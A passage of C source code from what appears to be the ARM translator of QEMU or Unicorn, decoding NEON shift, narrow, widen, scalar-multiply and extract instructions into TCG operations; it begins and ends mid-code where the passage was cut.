<< 4)) { if ((insn & 0x00380080) != 0) { /* Two registers and shift. */ op = (insn >> 8) & 0xf; if (insn & (1 << 7)) { /* 64-bit shift. */ if (op > 7) { return 1; } size = 3; } else { size = 2; while ((insn & (1 << (size + 19))) == 0) size--; } shift = (insn >> 16) & ((1 << (3 + size)) - 1); if (op < 8) { /* Shift by immediate: VSHR, VSRA, VRSHR, VRSRA, VSRI, VSHL, VQSHL, VQSHLU. */ if (q && ((rd | rm) & 1)) { return 1; } if (!u && (op == 4 || op == 6)) { return 1; } /* Right shifts are encoded as N - shift, where N is the element size in bits. */ if (op <= 4) { shift = shift - (1 << (size + 3)); } switch (op) { case 0: /* VSHR */ /* Right shift comes here negative. */ shift = -shift; /* Shifts larger than the element size are architecturally * valid. Unsigned results in all zeros; signed results * in all sign bits. */ if (!u) { tcg_gen_gvec_sari(tcg_ctx, size, rd_ofs, rm_ofs, MIN(shift, (8 << size) - 1), vec_size, vec_size); } else if (shift >= 8 << size) { tcg_gen_gvec_dup8i(tcg_ctx, rd_ofs, vec_size, vec_size, 0); } else { tcg_gen_gvec_shri(tcg_ctx, size, rd_ofs, rm_ofs, shift, vec_size, vec_size); } return 0; case 1: /* VSRA */ /* Right shift comes here negative. */ shift = -shift; /* Shifts larger than the element size are architecturally * valid. Unsigned results in all zeros; signed results * in all sign bits. */ if (!u) { tcg_gen_gvec_2i(tcg_ctx, rd_ofs, rm_ofs, vec_size, vec_size, MIN(shift, (8 << size) - 1), &ssra_op[size]); } else if (shift >= 8 << size) { /* rd += 0 */ } else { tcg_gen_gvec_2i(tcg_ctx, rd_ofs, rm_ofs, vec_size, vec_size, shift, &usra_op[size]); } return 0; case 4: /* VSRI */ if (!u) { return 1; } /* Right shift comes here negative. */ shift = -shift; /* Shift out of range leaves destination unchanged. */ if (shift < 8 << size) { tcg_gen_gvec_2i(tcg_ctx, rd_ofs, rm_ofs, vec_size, vec_size, shift, &sri_op[size]); } return 0; case 5: /* VSHL, VSLI */ if (u) { /* VSLI */ /* Shift out of range leaves destination unchanged. */ if (shift < 8 << size) { tcg_gen_gvec_2i(tcg_ctx, rd_ofs, rm_ofs, vec_size, vec_size, shift, &sli_op[size]); } } else { /* VSHL */ /* Shifts larger than the element size are * architecturally valid and results in zero. 
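 * (The dup of 0 below supplies the all-zeros result for that case.)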
*/ if (shift >= 8 << size) { tcg_gen_gvec_dup8i(tcg_ctx, rd_ofs, vec_size, vec_size, 0); } else { tcg_gen_gvec_shli(tcg_ctx, size, rd_ofs, rm_ofs, shift, vec_size, vec_size); } } return 0; } if (size == 3) { count = q + 1; } else { count = q ? 4: 2; } /* To avoid excessive duplication of ops we implement shift * by immediate using the variable shift operations. */ imm = dup_const(size, shift); for (pass = 0; pass < count; pass++) { if (size == 3) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm + pass); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_V1, imm); switch (op) { case 2: /* VRSHR */ case 3: /* VRSRA */ if (u) gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); else gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); break; case 6: /* VQSHLU */ gen_helper_neon_qshlu_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); break; case 7: /* VQSHL */ if (u) { gen_helper_neon_qshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); } else { gen_helper_neon_qshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); } break; default: g_assert_not_reached(); break; } if (op == 3) { /* Accumulate. */ neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } else { /* size < 3 */ /* Operands in T0 and T1. */ tmp = neon_load_reg(tcg_ctx, rm, pass); tmp2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp2, imm); switch (op) { case 2: /* VRSHR */ case 3: /* VRSRA */ GEN_NEON_INTEGER_OP(rshl); break; case 6: /* VQSHLU */ switch (size) { case 0: gen_helper_neon_qshlu_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; case 1: gen_helper_neon_qshlu_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; case 2: gen_helper_neon_qshlu_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; default: abort(); } break; case 7: /* VQSHL */ GEN_NEON_INTEGER_OP_ENV(qshl); break; default: g_assert_not_reached(); break; } tcg_temp_free_i32(tcg_ctx, tmp2); if (op == 3) { /* Accumulate. */ tmp2 = neon_load_reg(tcg_ctx, rd, pass); gen_neon_add(tcg_ctx, size, tmp, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); } neon_store_reg(tcg_ctx, rd, pass, tmp); } } /* for pass */ } else if (op < 10) { /* Shift by immediate and narrow: VSHRN, VRSHRN, VQSHRN, VQRSHRN. */ int input_unsigned = (op == 8) ? 
!u : u; if (rm & 1) { return 1; } shift = shift - (1 << (size + 3)); size++; if (size == 3) { tmp64 = tcg_const_i64(tcg_ctx, shift); neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm); neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + 1); for (pass = 0; pass < 2; pass++) { TCGv_i64 in; if (pass == 0) { in = tcg_ctx->cpu_V0; } else { in = tcg_ctx->cpu_V1; } if (q) { if (input_unsigned) { gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); } else { gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); } } else { if (input_unsigned) { gen_ushl_i64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); } else { gen_sshl_i64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); } } tmp = tcg_temp_new_i32(tcg_ctx); gen_neon_narrow_op(tcg_ctx, op == 8, u, size - 1, tmp, tcg_ctx->cpu_V0); neon_store_reg(tcg_ctx, rd, pass, tmp); } /* for pass */ tcg_temp_free_i64(tcg_ctx, tmp64); } else { if (size == 1) { imm = (uint16_t)shift; imm |= imm << 16; } else { /* size == 2 */ imm = (uint32_t)shift; } tmp2 = tcg_const_i32(tcg_ctx, imm); tmp4 = neon_load_reg(tcg_ctx, rm + 1, 0); tmp5 = neon_load_reg(tcg_ctx, rm + 1, 1); for (pass = 0; pass < 2; pass++) { if (pass == 0) { tmp = neon_load_reg(tcg_ctx, rm, 0); } else { tmp = tmp4; } gen_neon_shift_narrow(tcg_ctx, size, tmp, tmp2, q, input_unsigned); if (pass == 0) { tmp3 = neon_load_reg(tcg_ctx, rm, 1); } else { tmp3 = tmp5; } gen_neon_shift_narrow(tcg_ctx, size, tmp3, tmp2, q, input_unsigned); tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp3); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, tmp3); tmp = tcg_temp_new_i32(tcg_ctx); gen_neon_narrow_op(tcg_ctx, op == 8, u, size - 1, tmp, tcg_ctx->cpu_V0); neon_store_reg(tcg_ctx, rd, pass, tmp); } /* for pass */ tcg_temp_free_i32(tcg_ctx, tmp2); } } else if (op == 10) { /* VSHLL, VMOVL */ if (q || (rd & 1)) { return 1; } tmp = neon_load_reg(tcg_ctx, rm, 0); tmp2 = neon_load_reg(tcg_ctx, rm, 1); for (pass = 0; pass < 2; pass++) { if (pass == 1) tmp = tmp2; gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V0, tmp, size, u); if (shift != 0) { /* The shift is less than the width of the source type, so we can just shift the whole register. */ tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, shift); /* Widen the result of shift: we need to clear * the potential overflow bits resulting from * left bits of the narrow input appearing as * right bits of the left neighbour narrow * input. */ if (size < 2 || !u) { uint64_t imm64; if (size == 0) { imm = (0xffu >> (8 - shift)); imm |= imm << 16; } else if (size == 1) { imm = 0xffff >> (16 - shift); } else { /* size == 2 */ imm = 0xffffffff >> (32 - shift); } if (size < 2) { imm64 = imm | (((uint64_t)imm) << 32); } else { imm64 = imm; } tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, ~imm64); } } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } } else if (op >= 14) { /* VCVT fixed-point. */ TCGv_ptr fpst; TCGv_i32 shiftv; VFPGenFixPointFn *fn; if (!(insn & (1 << 21)) || (q && ((rd | rm) & 1))) { return 1; } if (!(op & 1)) { if (u) { fn = gen_helper_vfp_ultos; } else { fn = gen_helper_vfp_sltos; } } else { if (u) { fn = gen_helper_vfp_touls_round_to_zero; } else { fn = gen_helper_vfp_tosls_round_to_zero; } } /* We have already masked out the must-be-1 top bit of imm6, * hence this 32-shift where the ARM ARM has 64-imm6. */ shift = 32 - shift; fpst = get_fpstatus_ptr(tcg_ctx, 1); shiftv = tcg_const_i32(tcg_ctx, shift); for (pass = 0; pass < (q ?
4 : 2); pass++) { TCGv_i32 tmpf = neon_load_reg(tcg_ctx, rm, pass); fn(tcg_ctx, tmpf, tmpf, shiftv, fpst); neon_store_reg(tcg_ctx, rd, pass, tmpf); } tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, shiftv); } else { return 1; } } else { /* (insn & 0x00380080) == 0 */ int invert, reg_ofs, vec_size; if (q && (rd & 1)) { return 1; } op = (insn >> 8) & 0xf; /* One register and immediate. */ imm = (u << 7) | ((insn >> 12) & 0x70) | (insn & 0xf); invert = (insn & (1 << 5)) != 0; /* Note that op = 2,3,4,5,6,7,10,11,12,13 imm=0 is UNPREDICTABLE. * We choose to not special-case this and will behave as if a * valid constant encoding of 0 had been given. */ switch (op) { case 0: case 1: /* no-op */ break; case 2: case 3: imm <<= 8; break; case 4: case 5: imm <<= 16; break; case 6: case 7: imm <<= 24; break; case 8: case 9: imm |= imm << 16; break; case 10: case 11: imm = (imm << 8) | (imm << 24); break; case 12: imm = (imm << 8) | 0xff; break; case 13: imm = (imm << 16) | 0xffff; break; case 14: imm |= (imm << 8) | (imm << 16) | (imm << 24); if (invert) { imm = ~imm; } break; case 15: if (invert) { return 1; } imm = ((imm & 0x80) << 24) | ((imm & 0x3f) << 19) | ((imm & 0x40) ? (0x1f << 25) : (1 << 30)); break; } if (invert) { imm = ~imm; } reg_ofs = neon_reg_offset(rd, 0); vec_size = q ? 16 : 8; if (op & 1 && op < 12) { if (invert) { /* The immediate value has already been inverted, * so BIC becomes AND. */ tcg_gen_gvec_andi(tcg_ctx, MO_32, reg_ofs, reg_ofs, imm, vec_size, vec_size); } else { tcg_gen_gvec_ori(tcg_ctx, MO_32, reg_ofs, reg_ofs, imm, vec_size, vec_size); } } else { /* VMOV, VMVN. */ if (op == 14 && invert) { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); for (pass = 0; pass <= q; ++pass) { uint64_t val = 0; int n; for (n = 0; n < 8; n++) { if (imm & (1 << (n + pass * 8))) { val |= 0xffull << (n * 8); } } tcg_gen_movi_i64(tcg_ctx, t64, val); neon_store_reg64(tcg_ctx, t64, rd + pass); } tcg_temp_free_i64(tcg_ctx, t64); } else { tcg_gen_gvec_dup32i(tcg_ctx, reg_ofs, vec_size, vec_size, imm); } } } } else { /* (insn & 0x00800010 == 0x00800000) */ if (size != 3) { op = (insn >> 8) & 0xf; if ((insn & (1 << 6)) == 0) { /* Three registers of different lengths. */ int src1_wide; int src2_wide; int prewiden; /* undefreq: bit 0 : UNDEF if size == 0 * bit 1 : UNDEF if size == 1 * bit 2 : UNDEF if size == 2 * bit 3 : UNDEF if U == 1 * Note that [2:0] set implies 'always UNDEF' */ int undefreq; /* prewiden, src1_wide, src2_wide, undefreq */ static const int neon_3reg_wide[16][4] = { {1, 0, 0, 0}, /* VADDL */ {1, 1, 0, 0}, /* VADDW */ {1, 0, 0, 0}, /* VSUBL */ {1, 1, 0, 0}, /* VSUBW */ {0, 1, 1, 0}, /* VADDHN */ {0, 0, 0, 0}, /* VABAL */ {0, 1, 1, 0}, /* VSUBHN */ {0, 0, 0, 0}, /* VABDL */ {0, 0, 0, 0}, /* VMLAL */ {0, 0, 0, 9}, /* VQDMLAL */ {0, 0, 0, 0}, /* VMLSL */ {0, 0, 0, 9}, /* VQDMLSL */ {0, 0, 0, 0}, /* Integer VMULL */ {0, 0, 0, 1}, /* VQDMULL */ {0, 0, 0, 0xa}, /* Polynomial VMULL */ {0, 0, 0, 7}, /* Reserved: always UNDEF */ }; prewiden = neon_3reg_wide[op][0]; src1_wide = neon_3reg_wide[op][1]; src2_wide = neon_3reg_wide[op][2]; undefreq = neon_3reg_wide[op][3]; if ((undefreq & (1 << size)) || ((undefreq & 8) && u)) { return 1; } if ((src1_wide && (rn & 1)) || (src2_wide && (rm & 1)) || (!src2_wide && (rd & 1))) { return 1; } /* Handle polynomial VMULL in a single pass. 
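 * (The polynomial product has no inter-lane carries, so both
 * VMULL.P8 and VMULL.P64 can be emitted as a single out-of-line
 * gvec helper over the whole vector, with no per-pass loop.)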
*/ if (op == 14) { if (size == 0) { /* VMULL.P8 */ tcg_gen_gvec_3_ool(tcg_ctx, rd_ofs, rn_ofs, rm_ofs, 16, 16, 0, gen_helper_neon_pmull_h); } else { /* VMULL.P64 */ if (!dc_isar_feature(aa32_pmull, s)) { return 1; } tcg_gen_gvec_3_ool(tcg_ctx, rd_ofs, rn_ofs, rm_ofs, 16, 16, 0, gen_helper_gvec_pmull_q); } return 0; } /* Avoid overlapping operands. Wide source operands are always aligned so will never overlap with wide destinations in problematic ways. */ if (rd == rm && !src2_wide) { tmp = neon_load_reg(tcg_ctx, rm, 1); neon_store_scratch(tcg_ctx, 2, tmp); } else if (rd == rn && !src1_wide) { tmp = neon_load_reg(tcg_ctx, rn, 1); neon_store_scratch(tcg_ctx, 2, tmp); } tmp3 = NULL; for (pass = 0; pass < 2; pass++) { if (src1_wide) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + pass); tmp = NULL; } else { if (pass == 1 && rd == rn) { tmp = neon_load_scratch(tcg_ctx, 2); } else { tmp = neon_load_reg(tcg_ctx, rn, pass); } if (prewiden) { gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V0, tmp, size, u); } } if (src2_wide) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + pass); tmp2 = NULL; } else { if (pass == 1 && rd == rm) { tmp2 = neon_load_scratch(tcg_ctx, 2); } else { tmp2 = neon_load_reg(tcg_ctx, rm, pass); } if (prewiden) { gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V1, tmp2, size, u); } } switch (op) { case 0: case 1: case 4: /* VADDL, VADDW, VADDHN, VRADDHN */ gen_neon_addl(tcg_ctx, size); break; case 2: case 3: case 6: /* VSUBL, VSUBW, VSUBHN, VRSUBHN */ gen_neon_subl(tcg_ctx, size); break; case 5: case 7: /* VABAL, VABDL */ switch ((size << 1) | u) { case 0: gen_helper_neon_abdl_s16(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; case 1: gen_helper_neon_abdl_u16(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; case 2: gen_helper_neon_abdl_s32(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; case 3: gen_helper_neon_abdl_u32(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; case 4: gen_helper_neon_abdl_s64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; case 5: gen_helper_neon_abdl_u64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); break; default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); break; case 8: case 9: case 10: case 11: case 12: case 13: /* VMLAL, VQDMLAL, VMLSL, VQDMLSL, VMULL, VQDMULL */ gen_neon_mull(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2, size, u); break; default: /* 15 is RESERVED: caught earlier */ abort(); } if (op == 13) { /* VQDMULL */ gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } else if (op == 5 || (op >= 8 && op <= 11)) { /* Accumulate. */ neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); switch (op) { case 10: /* VMLSL */ gen_neon_negl(tcg_ctx, tcg_ctx->cpu_V0, size); /* Fall through */ case 5: case 8: /* VABAL, VMLAL */ gen_neon_addl(tcg_ctx, size); break; case 9: case 11: /* VQDMLAL, VQDMLSL */ gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); if (op == 11) { gen_neon_negl(tcg_ctx, tcg_ctx->cpu_V0, size); } gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, size); break; default: abort(); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } else if (op == 4 || op == 6) { /* Narrowing operation. 
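 * (VADDHN/VSUBHN keep the high half of each wide element; the
 * rounding forms, selected by u, add half an LSB of the result
 * first -- e.g. the 1u << 31 below for the size == 2 case.)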
*/ tmp = tcg_temp_new_i32(tcg_ctx); if (!u) { switch (size) { case 0: gen_helper_neon_narrow_high_u8(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; case 1: gen_helper_neon_narrow_high_u16(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; case 2: tcg_gen_extrh_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; default: abort(); } } else { switch (size) { case 0: gen_helper_neon_narrow_round_high_u8(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; case 1: gen_helper_neon_narrow_round_high_u16(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; case 2: tcg_gen_addi_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 1u << 31); tcg_gen_extrh_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); break; default: abort(); } } if (pass == 0) { tmp3 = tmp; } else { neon_store_reg(tcg_ctx, rd, 0, tmp3); neon_store_reg(tcg_ctx, rd, 1, tmp); } } else { /* Write back the result. */ neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } } } else { /* Two registers and a scalar. NB that for ops of this form * the ARM ARM labels bit 24 as Q, but it is in our variable * 'u', not 'q'. */ if (size == 0) { return 1; } switch (op) { case 1: /* Float VMLA scalar */ case 5: /* Floating point VMLS scalar */ case 9: /* Floating point VMUL scalar */ if (size == 1) { return 1; } /* fall through */ case 0: /* Integer VMLA scalar */ case 4: /* Integer VMLS scalar */ case 8: /* Integer VMUL scalar */ case 12: /* VQDMULH scalar */ case 13: /* VQRDMULH scalar */ if (u && ((rd | rn) & 1)) { return 1; } tmp = neon_get_scalar(tcg_ctx, size, rm); neon_store_scratch(tcg_ctx, 0, tmp); for (pass = 0; pass < (u ? 4 : 2); pass++) { tmp = neon_load_scratch(tcg_ctx, 0); tmp2 = neon_load_reg(tcg_ctx, rn, pass); if (op == 12) { if (size == 1) { gen_helper_neon_qdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); } else { gen_helper_neon_qdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); } } else if (op == 13) { if (size == 1) { gen_helper_neon_qrdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); } else { gen_helper_neon_qrdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); } } else if (op & 1) { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_muls(tcg_ctx, tmp, tmp, tmp2, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); } else { switch (size) { case 0: gen_helper_neon_mul_u8(tcg_ctx, tmp, tmp, tmp2); break; case 1: gen_helper_neon_mul_u16(tcg_ctx, tmp, tmp, tmp2); break; case 2: tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); break; default: abort(); } } tcg_temp_free_i32(tcg_ctx, tmp2); if (op < 8) { /* Accumulate. */ tmp2 = neon_load_reg(tcg_ctx, rd, pass); switch (op) { case 0: gen_neon_add(tcg_ctx, size, tmp, tmp2); break; case 1: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case 4: gen_neon_rsb(tcg_ctx, size, tmp, tmp2); break; case 5: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_subs(tcg_ctx, tmp, tmp2, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); } neon_store_reg(tcg_ctx, rd, pass, tmp); } break; case 3: /* VQDMLAL scalar */ case 7: /* VQDMLSL scalar */ case 11: /* VQDMULL scalar */ if (u == 1) { return 1; } /* fall through */ case 2: /* VMLAL scalar */ case 6: /* VMLSL scalar */ case 10: /* VMULL scalar */ if (rd & 1) { return 1; } tmp2 = neon_get_scalar(tcg_ctx, size, rm); /* We need a copy of tmp2 because gen_neon_mull * deletes it during pass 0.
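 * (A plain tcg_gen_mov_i32 into the fresh temp below keeps a
 * live operand around for pass 1.)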
*/ tmp4 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, tmp4, tmp2); tmp3 = neon_load_reg(tcg_ctx, rn, 1); for (pass = 0; pass < 2; pass++) { if (pass == 0) { tmp = neon_load_reg(tcg_ctx, rn, 0); } else { tmp = tmp3; tmp2 = tmp4; } gen_neon_mull(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2, size, u); if (op != 11) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); } switch (op) { case 6: gen_neon_negl(tcg_ctx, tcg_ctx->cpu_V0, size); /* Fall through */ case 2: gen_neon_addl(tcg_ctx, size); break; case 3: case 7: gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); if (op == 7) { gen_neon_negl(tcg_ctx, tcg_ctx->cpu_V0, size); } gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, size); break; case 10: /* no-op */ break; case 11: gen_neon_addl_saturate(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); break; default: abort(); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } break; case 14: /* VQRDMLAH scalar */ case 15: /* VQRDMLSH scalar */ { NeonGenThreeOpEnvFn *fn; if (!dc_isar_feature(aa32_rdm, s)) { return 1; } if (u && ((rd | rn) & 1)) { return 1; } if (op == 14) { if (size == 1) { fn = gen_helper_neon_qrdmlah_s16; } else { fn = gen_helper_neon_qrdmlah_s32; } } else { if (size == 1) { fn = gen_helper_neon_qrdmlsh_s16; } else { fn = gen_helper_neon_qrdmlsh_s32; } } tmp2 = neon_get_scalar(tcg_ctx, size, rm); for (pass = 0; pass < (u ? 4 : 2); pass++) { tmp = neon_load_reg(tcg_ctx, rn, pass); tmp3 = neon_load_reg(tcg_ctx, rd, pass); fn(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2, tmp3); tcg_temp_free_i32(tcg_ctx, tmp3); neon_store_reg(tcg_ctx, rd, pass, tmp); } tcg_temp_free_i32(tcg_ctx, tmp2); } break; default: g_assert_not_reached(); break; } } } else { /* size == 3 */ if (!u) { /* Extract. */ imm = (insn >> 8) & 0xf; if (imm > 7 && !q) return 1; if (q && ((rd | rn | rm) & 1)) { return 1; } if (imm == 0) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); if (q) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rn + 1); } } else if (imm == 8) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + 1); if (q) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); } } else if (q) { tmp64 = tcg_temp_new_i64(tcg_ctx); if (imm < 8) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); neon_load_reg64(tcg_ctx, tmp64, rn + 1); } else { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + 1); neon_load_reg64(tcg_ctx, tmp64, rm); } tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, (imm & 7) * 8); tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tmp64, 64 - ((imm & 7) * 8)); tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); if (imm < 8) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); } else { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + 1); imm -= 8; } tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, 64 - (imm * 8)); tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, imm * 8); tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, tmp64); tcg_temp_free_i64(tcg_ctx, tmp64); } else { /* BUGFIX */ neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, imm * 8); neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, 64 - (imm * 8)); tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd); if (q) { neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + 1); } } else if ((insn & (1 << 11)) == 0) { /* Two register misc. 
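 * (The table index is reassembled from two fields of the insn:
 * op[5:4] = insn[17:16] and op[3:0] = insn[10:7]; size is taken
 * from insn[19:18].)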
*/ op = ((insn >> 12) & 0x30) | ((insn >> 7) & 0xf); size = (insn >> 18) & 3; /* UNDEF for unknown op values and bad op-size combinations */ if ((neon_2rm_sizes[op] & (1 << size)) == 0) { return 1; } if (neon_2rm_is_v8_op(op) && !arm_dc_feature(s, ARM_FEATURE_V8)) { return 1; } if ((op != NEON_2RM_VMOVN && op != NEON_2RM_VQMOVN) && q && ((rm | rd) & 1)) { return 1; } switch (op) { case NEON_2RM_VREV64: for (pass = 0; pass < (q ? 2 : 1); pass++) { tmp = neon_load_reg(tcg_ctx, rm, pass * 2); tmp2 = neon_load_reg(tcg_ctx, rm, pass * 2 + 1); switch (size) { case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); break; case 1: gen_swap_half(tcg_ctx, tmp); break; case 2: /* no-op */ break; default: abort(); } neon_store_reg(tcg_ctx, rd, pass * 2 + 1, tmp); if (size == 2) { neon_store_reg(tcg_ctx, rd, pass * 2, tmp2); } else { switch (size) { case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp2, tmp2); break; case 1: gen_swap_half(tcg_ctx, tmp2); break; default: abort(); } neon_store_reg(tcg_ctx, rd, pass * 2, tmp2); } } break; case NEON_2RM_VPADDL: case NEON_2RM_VPADDL_U: case NEON_2RM_VPADAL: case NEON_2RM_VPADAL_U: for (pass = 0; pass < q + 1; pass++) { tmp = neon_load_reg(tcg_ctx, rm, pass * 2); gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V0, tmp, size, op & 1); tmp = neon_load_reg(tcg_ctx, rm, pass * 2 + 1); gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V1, tmp, size, op & 1); switch (size) { case 0: gen_helper_neon_paddl_u16(tcg_ctx, CPU_V001); break; case 1: gen_helper_neon_paddl_u32(tcg_ctx, CPU_V001); break; case 2: tcg_gen_add_i64(tcg_ctx, CPU_V001); break; default: abort(); } if (op >= NEON_2RM_VPADAL) { /* Accumulate. */ neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); gen_neon_addl(tcg_ctx, size); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } break; case NEON_2RM_VTRN: if (size == 2) { int n; for (n = 0; n < (q ? 
